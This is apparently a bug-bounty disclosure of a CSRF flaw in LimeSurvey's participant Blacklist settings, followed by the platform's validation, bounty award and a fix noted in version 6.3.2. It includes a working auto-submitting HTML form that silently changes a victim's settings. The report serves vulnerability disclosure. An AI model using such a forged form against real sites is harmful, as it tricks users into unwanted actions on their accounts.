CSRF edit Blacklist settings( YES to NO) in limesurvey/limesurvey

Valid

Reported on

Sep 30th 2023


Description

CSRF edit Blacklist settings

Proof of Concept

1 .For example, the data fields in the Blacklist settings are all set to: YES.

2 .The attacker sends a fake form to the user:

<html>
  <body>
    <form action="https://haido456.limesurvey.net/admin/participants/sa/storeBlacklistValues">
      <input type="hidden" name="YII&#95;CSRF&#95;TOKEN" value="" />
      <input type="hidden" name="blacklistallsurveys" value="0" />
      <input type="hidden" name="blacklistnewsurveys" value="0" />
      <input type="hidden" name="blockaddingtosurveys" value="0" />
      <input type="hidden" name="hideblacklisted" value="0" />
      <input type="hidden" name="deleteblacklisted" value="0" />
      <input type="hidden" name="allowunblacklist" value="0" />
      <input type="hidden" name="yt0" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

3 .User Clicked, changed the setting to NO, which the user did not want

Payload Poc

https://drive.google.com/file/d/1AedqQB1uE47M6EAjjytbtEQRRjmZyC_0/view?usp=sharing

Video Poc

https://drive.google.com/file/d/14IQ3AGsT9raKCyT0KMFYVMqWciyiBWtL/view?usp=sharing

Impact

Trick users into taking unwanted actions.

We are processing your report and will contact the limesurvey team within 24 hours. 5 months ago
HaiNguyen modified the report
5 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 5 months ago
HaiNguyen
5 months ago

Researcher


Hi, any new update ?

HaiNguyen
5 months ago

Researcher


any new update ?

tiborpacalat
5 months ago

Internal tracking number: 19165

tiborpacalat validated this vulnerability 4 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tiborpacalat marked this as fixed in 6.3.2+231031 with commit 238c39 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago
to join this conversation